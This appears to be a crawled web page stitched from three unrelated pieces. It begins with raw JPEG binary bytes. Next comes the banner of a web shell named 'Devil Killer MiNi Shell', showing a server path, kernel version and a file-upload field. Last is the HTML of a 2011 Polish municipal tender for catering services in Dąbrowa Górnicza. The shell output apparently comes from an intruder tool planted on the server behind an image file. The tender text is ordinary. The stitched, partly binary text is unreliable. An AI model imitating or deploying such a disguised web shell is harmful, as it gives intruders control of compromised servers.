JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110406/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110406/108005-N-2011.html

<p class="kh_header"><b>Dąbrowa Górnicza: Świadczenie usług cateringowych dla Urzędu Miejskiego w Dąbrowie Górniczej</b><br>
<b>Numer ogłoszenia: 108005 - 2011; data zamieszczenia: 06.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski , ul. Graniczna 21, 41-300 Dąbrowa Górnicza, woj. śląskie, tel. 032 2956700, faks 032 2625032, 2956700.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.dabrowa-gornicza.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług cateringowych dla Urzędu Miejskiego w Dąbrowie Górniczej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Postępowanie o udzielenie zamówienia prowadzone jest w trybie przetargu nieograniczonego na podstawie ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2010 r., Nr 113, poz. 759 z późn. zm.), zwanej dalej Ustawą o wartości zamówienia poniżej 193.000,00 EUR.II. Przedmiotem zamówienia jest: Świadczenie usług cateringowych dla Urzędu Miejskiego w Dąbrowie Górniczej.
III.Świadczenie usług cateringowych będzie odbywało się sukcesywnie w okresie obowiązywania umowy w ramach organizowanych przez Zamawiającego spotkań okolicznościowych, imprez (w tym imprez plenerowych), konferencji/seminariów, zawodów oraz innych zaistniałych okoliczności np. akcji ratowniczych.
IV. Przedmiot zamówienia obejmuje przygotowanie, dostawę, podanie wybranych z poniższego menu posiłków i napojów:
Lp.	Rodzaj posiłku	Gramatura
1.	Pierś z kurczaka nadziewana szpinakiem w sosie śmietanowym	200g
2.	Boeuf Strogonow	300ml
3.	Gulasz po węgiersku	300ml
4.	Bogracz	300ml
5.	Kotlet schabowy	200g
6.	Kotlet de volaille z serem i pieczarkami	200g
7.	Pieczeń wołowa w sosie grzybowym	200g
8.	Pieczone udko z kurczaka	200g
9.	Pierś z kurczaka smażona	200g
10.	Karp smażony	200g
11.	Pstrąg z grilla	200g
12.	Łosoś z grilla	200g
13.	Pierogi z kapustą i grzybami	300g
14.	Rosół z makaronem	250ml
15.	Zupa krem borowikowa	250ml
16.	Zupa krem porowa	250ml
17.	Zupa krem brokułowa	250ml
18.	Zupa grochowa z kiełbasą	350ml
19.	Zupa grochowa	300ml
20.	Zupa gulaszowa	300ml
21.	Barszcz czerwony z pasztecikiem	250ml
22.	Barszcz czerwony z uszkami	250ml
23.	Żurek wiejski (z kiełbasą i jajkiem)	350ml
24.	Bigos	300g
25.	Kiełbasa z grilla (łącznie z dodatkami: ketchup, musztarda)	200g
26.	Karkówka z grilla (łącznie z dodatkami: ketchup, musztarda)	200g
27.	Szaszłyk mięsno-warzywny z grilla (łącznie z dodatkami: ketchup, musztarda)	200g
28.	Kaszanka z grilla (łącznie z dodatkami: ketchup, musztarda)	200g
29.	Pieczonki (skład minimum: ziemniaki, marchewka, burak, cebula, kiełbasa, boczek)	300g
30.	Borowiki w śmietanie	200g
31.	Jajka faszerowane pieczarkami na ciepło	200g
32.	Surówka z kapusty białej	200g
33.	Surówka z kapusty czerwonej	200g
34.	Surówka z kapusty kiszonej	200g
35.	Surówka colesław	200g
36.	Surówka z marchwi	200g
37.	Sałatka grecka (skład minimum: pomidor, ogórek zielony, oliwki, ser feta, cebula)	200g
38.	Kapusta zasmażana	150g
39.	Ziemniaki gotowane	150g
40.	Ziemniaki smażone	150g
41.	Frytki	150g
42.	Dufinki	150g
43.	Kluski śląskie	150g
44.	Ryż na sypko	150g
45.	Schab nadziewany suszonymi śliwkami	200g
46.	Kanapki bankietowe na pieczywie razowym (różnych rodzajów: z serem, z szynką, warzywami )	1 sztuka/50g
47.	Karp w galarecie	200g
48.	Pstrąg w galarecie	200g
49.	Ryba po grecku	200g
50.	Tymbalik drobiowy	100g
51.	Roladki szynkowe z kremem chrzanowym	200g
52.	Smalec swojski	1kg
53.	Ogórki kiszone	1kg
54.	Zestaw serów (10 różnych rodzajów m.in.: gouda, camembert, brie, edam, cheddar) z przybraniem	300g
55.	Zestaw wędlin (10 różnych rodzajów m.in.: szynka, polędwica wieprzowa, polędwica drobiowa, salami, schab pieczony, karczek) z przybraniem	300g
56.	Sałatka jarzynowa z majonezem	200g
57.	Pasztet w cieście francuskim	200g
58.	Koreczki  (różnych rodzajów:  z wędliną, warzywami, serem)	1 sztuka/25g
59.	Koreczki rybne (różnych rodzajów: z łososiem, śledziem itp.)	1 sztuka/25g
60.	Tartinki (krakers + dodatki różnych rodzajów: wędlina, ser, warzywa + dip)	1 sztuka/25g
61.	Sernik po wiedeńsku	1kg
62.	Ciasteczka bankietowe (różne rodzaje: kruche, z cukrem, z czekoladą, z nadzieniem, kokosowe itp.)	1kg
63.	Ciasto tortowe	1kg
64.	Ciasto w-z	1kg
65.	Pączki z nadzieniem budyniowym lub marmoladą	1 sztuka/100g
66.	Bułka słodka z budyniem, serem, dżemem lub makiem	1 sztuka/ 90g
67.	Babeczki owocowe	1 sztuka/70g
68.	Talerz owoców sezonowych	1kg
69.	Sok 100% (różnych rodzajów: pomarańczowy, jabłkowy, wieloowocowy itp.) typu Fortuna lub równoważny	1 litr
70.	Woda mineralna niegazowana typu Nałęczowianka lub równoważna	1 litr
71.	Woda mineralna gazowana typu Nałęczowianka lub równoważna	1 litr
72.	Napój gazowany słodzony typu Coca-cola lub równoważny	1 litr
73.	Kawa rozpuszczalna (łącznie z dodatkami: cukier, mleczko do kawy w płynie) typu Jacobs lub równoważna	200ml
74.	Herbata (łącznie z dodatkami: cukier, plasterek cytryny) typu Lipton lub równoważna	200ml
75.	Bułka zwykła pszenna 	1 sztuka/90g
76.	Chleb wiejski	1 kg
V. Zamawiający w ramach świadczenia usług cateringowych przewiduje m.in. następujące zlecenia:
- Samorządowy Turniej Bowlingowy o Puchar Prezydenta Miasta  z okazji Dni Dąbrowy Górniczej 
( ilość osób ok. 50, przewidywany termin: 27-29.05.2011r.)
- Samorządowe zawody wędkarskie o Puchar Prezydenta Miasta  z okazji Dni Dąbrowy Górniczej  (ilość osób ok. 40, przewidywany termin: 27-29.05.2011r. )
- Dni Dąbrowy Górniczej 
(ilość osób ok. 200, przewidywany termin: 27-29.05.2011r.)
- Zawody sportowo-pożarnicze -
(ilość osób ok. 160, przewidywany termin: po 18.06.2011r.)
- Dożynki Miejskie 
(ilość osób ok. 500, przewidywany termin: 28.08.2011r.)
- V Międzynarodowy Konkurs Muzyczny im. M. Spisaka 
(ilość osób ok. 700, przewidywany termin: 5-14.09.2011r.)
- Jubileusz OSP Łosień 
(ilość osób ok. 100, przewidywany termin:  09.2011r.)
- Młodzieżowe zawody sportowo - pożarnicze
(ilość osób ok. 100, przewidywany termin:  09.2011r.)
- Festiwal Inicjatyw Pozarządowych
(ilość osób ok. 300, przewidywany termin: druga połowa 09.2011r.)
- Jubileusz OSP Okradzionów
(ilość osób ok. 100, przewidywany termin:  10.2011r.)
- V Mistrzostwa Pracowników Samorządowych i Radnych GZM
(ilość osób ok. 300, przewidywany termin: 10.2011r.)
- Kiermasz Świąteczny
(ilość osób ok. 400, przewidywany termin:16.12.2011r.)
- Spotkanie wigilijne Zarządu Powiatowego Ochotniczych Straży Pożarnych -
(ilość osób ok. 50, przewidywany termin: 12.2011r.)
- Spotkanie wigilijne Prezydenta Miasta z Zarządami Dąbrowskich Stowarzyszeń Sportowych
(ilość osób ok. 60, przewidywany termin: 12.2011r.)
- ewentualne akcje ratownicze
(posiłki i napoje dla strażaków ochotników biorących udział w akcjach ratowniczo - gaśniczych oraz osób poszkodowanych w zdarzeniach)
- inne zlecenia
VI. Usługi cateringowe będą świadczone w siedzibie Zamawiającego lub w miejscu przez Zamawiającego wyznaczonym na terenie Dąbrowy Górniczej.
VII. Ilość porcji oraz rodzaj posiłku i napojów każdorazowo będą określane i zlecane przez Zamawiającego telefonicznie, faksem lub e-mailem z 2 dniowym wyprzedzeniem z podaniem terminu, miejsca, sposobu podania oraz godziny podania posiłków i napojów.
VIII. Ilość porcji oraz rodzaj posiłku i napojów w przypadku akcji ratowniczych  będą określane i zlecane przez Zamawiającego telefonicznie z co najmniej 4 godzinnym wyprzedzeniem z podaniem miejsca i godziny podania posiłków i napojów.
IX. Posiłki winny być świeże, I gatunku i przygotowane przez Wykonawcę wyłącznie przy użyciu produktów spełniających normy jakości produktów spożywczych.
X. Posiłki nie mogą być wykonane z produktów typu instant (np. zupy w proszku sosy, itp.) oraz produktów gotowych (np. mrożone pierogi itp.)
XI. Posiłki i napoje winny być dostarczone przez Wykonawcę jego transportem, na miejsce wskazane przez Zamawiającego, najpóźniej na 30 minut przed ustalonymi z Zamawiającym godzinami. 
XII. Wykonawca odpowiada za transport przedmiotu zamówienia, przygotowanie oraz podanie go zgodnie z wymaganiami sanitarnymi dotyczącymi żywności i żywienia, w szczególności zobowiązany jest do przestrzegania wymagań określonych w ustawie o bezpieczeństwie żywności i żywienia.
XIII. Stoły winny być przygotowane przez Wykonawcę w sposób ustalony każdorazowo z Zamawiającym.
XIV. Posiłki  typu zimna płyta winny być podane najpóźniej na 15 minut przed ustalonymi z Zamawiającym godzinami.
XV. Posiłki i napoje winny być podane w sposób estetyczny.
XVI. Posiłki i napoje winny być podawane  przez obsługę kelnerską Wykonawcy.
XVII. Wykonawca (w zależności od ilości osób uczestniczących w spotkaniu czy innym zdarzeniu o którym mowa w pkt. III zapewni każdorazowo do obsługi od 1 do 5 osób.
XVIII. Posprzątanie stołów, zebranie naczyń oraz resztek pokonsumpcyjnych należy do Wykonawcy i winno się odbyć niezwłocznie po zakończeniu spotkania czy innego zdarzenia o którym mowa w pkt. III.
XIX. Podanie posiłków i napojów (w zależności od okazji): w zastawie ceramicznej/porcelanowej z użyciem sztućców ze stali nierdzewnej, serwetek i obrusów materiałowych, w szklankach literatkach, filiżankach lub w naczyniach jednorazowych z użyciem sztućców, serwetek i obrusów  jednorazowych zależy od wyboru Zamawiającego. 
XX. Użyta zastawa oraz stoły dostarczone przez Wykonawcę w przypadku zaistnienia takiej potrzeby winny być czyste i nieuszkodzone.
XXI. Posiłki winny być przygotowane zgodnie z ustalonym przez Zamawiającego menu.
XXII. Wykonawca zobowiązuje się na bieżąco uwzględnić ewentualne sugestie i życzenia Zamawiającego dotyczące sposobu realizacji złożonych przez Zamawiającego zleceń.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających w stosunku do zamówienia podstawowego opisanego w specyfikacji na podstawie art. 67 ust.1 pkt. 6 Ustawy. Realizacja zamówień uzupełniających odbywać się będzie w zakresie przewidzianym opisem przedmiotu zamówienia i określonym kodem CPV do wartości 50% zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5, 55.32.10.00-6, 55.32.00.00-9, 55.52.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że posiada aktualną decyzję o zatwierdzeniu zakładu i o wpisie do rejestru zakładów podlegających urzędowej kontroli organów Państwowej Inspekcji Sanitarnej, pozwalającą na prowadzenie działalności w zakresie usług cateringowych. Ocena spełnienia warunku udziału w postępowaniu będzie dokonana w oparciu o złożoną wraz z ofertą decyzję wg formuły: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że: w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie wykonał usługi w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia tj.: 
- min. 2 usługi cateringowe polegające na obsłudze dużych imprez plenerowych typu festyny, pikniki, dożynki, imprezy rekreacyjno-sportowe itp. o wartości minimum 8.000,00 zł brutto każda,
- min. 2 usługi cateringowe polegające na obsłudze imprez okolicznościowych typu koncerty, konkursy, jubileusze, bankiety itp. o wartości minimum 9.000,00 zł brutto każda,
- min. 2 usługi cateringowe polegające na obsłudze konferencji, seminariów, szkoleń, spotkań itp. o wartości minimum 3.000,00 zł brutto każda.
Uwagi: 
1. Jeżeli zakres wskazanych i udokumentowanych, przez Wykonawcę w wykazie, usług jest szerszy niż wymagany przez Zamawiającego, Wykonawca winien w wykazie wskazać zakres i wartość usług odpowiadających zakresowi wymaganemu przez Zamawiającego.
2. Równowartość w złotych zadań rozliczanych w walutach obcych zostanie określona według średniego kursu złotego w stosunku do walut obcych ogłoszonego przez NBP obowiązującego  w dniu, w którym opublikowane zostało ogłoszenie o niniejszym zamówieniu. 
3. W przypadku, gdy Wykonawca polega na zasobach innych podmiotów przy wykazaniu spełniania warunku wiedzy i doświadczenia, zobowiązany jest wykazać udział tych podmiotów w wykonaniu zamówienia.
Ocena spełniania warunku udziału w postępowaniu będzie dokonana w oparciu o złożony wraz z ofertą wykaz wykonanych usług i dokumenty potwierdzające ich należyte wykonanie wg formuły: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty  należy załączyć:
1. Formularz ofertowy - załącznik nr 1 do SIWZ (wskazana data podpisania);
2. Pełnomocnictwo do reprezentowania Wykonawcy - jeżeli zostało ustanowione bądź do reprezentowania Wykonawców wspólnie ubiegających się o zamówienie przedłożone w formie oryginału lub kopii poświadczonej przez notariusza (dotyczy również spółki cywilnej);
3. Zobowiązanie innych podmiotów, w szczególności pisemne, do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, wymagane w przypadku gdy Wykonawca polega na ich zasobach na zasadach określonych w art. 26 ust. 2b Ustawy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Doświadczenie w świadczeniu usług cateringowych - 15</li>
<li>3 - Jakość świadczenia usług cateringowych - 15</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, w przypadku zmiany obowiązujących przepisów prawa istotnych dla postanowień zawartej umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.dabrowa-gornicza.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Dąbrowie Górniczej, 41-300 Dąbrowa Górnicza, ul. Graniczna 21, Wydział Kultury i Sportu.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.04.2011 godzina 12:30, miejsce: Urząd Miejski w Dąbrowie Górniczej, ul. Graniczna 21, parter stanowisko nr 13 - INFORMACJA.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamówienie nie jest finansowane ze środków Unii Europejskiej.
